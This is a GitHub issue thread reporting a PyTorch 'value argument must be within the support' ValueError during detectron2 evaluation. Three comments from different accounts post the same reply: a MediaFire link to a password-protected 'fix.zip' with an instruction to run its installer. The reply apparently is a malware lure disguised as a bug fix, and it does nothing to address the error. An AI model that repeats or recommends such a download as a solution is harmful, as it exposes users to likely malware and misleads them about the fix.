### ISSUE TITLE
ValueError: The value argument must be within the support

### ISSUE THREAD

**Issue by GitHubAaronhuang** [lxycopper/PLU#7]
Traceback (most recent call last):
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/multiprocessing/spawn.py", line 59, in _wrap
    fn(i, *args)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/engine/launch.py", line 94, in _distributed_worker
    main_func(*args)
  File "/home/mrp/hyy/OWOD/PLU/tools/train_net.py", line 139, in main
    res = Trainer.test(cfg, model)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/engine/defaults.py", line 525, in test
    results_i = inference_on_dataset(model, data_loader, evaluator)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/evaluation/evaluator.py", line 145, in inference_on_dataset
    evaluator.process(inputs, outputs)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/evaluation/pascal_voc_evaluation.py", line 122, in process
    classes = self.update_label_based_on_energy(logits, classes)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/evaluation/pascal_voc_evaluation.py", line 101, in update_label_based_on_energy
    p_unk = self.compute_prob(energy, self.unk_dist)
  File "/home/mrp/hyy/OWOD/PLU/detectron2/evaluation/pascal_voc_evaluation.py", line 87, in compute_prob
    pdf = distribution.log_prob(dx).exp()
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/distributions/transformed_distribution.py", line 149, in log_prob
    log_prob = log_prob + _sum_rightmost(self.base_dist.log_prob(y),
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/distributions/transformed_distribution.py", line 138, in log_prob
    self._validate_sample(value)
  File "/home/mrp/anaconda3/envs/OWOD/lib/python3.8/site-packages/torch/distributions/distribution.py", line 277, in _validate_sample
    raise ValueError('The value argument must be within the support')
ValueError: The value argument must be within the support

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
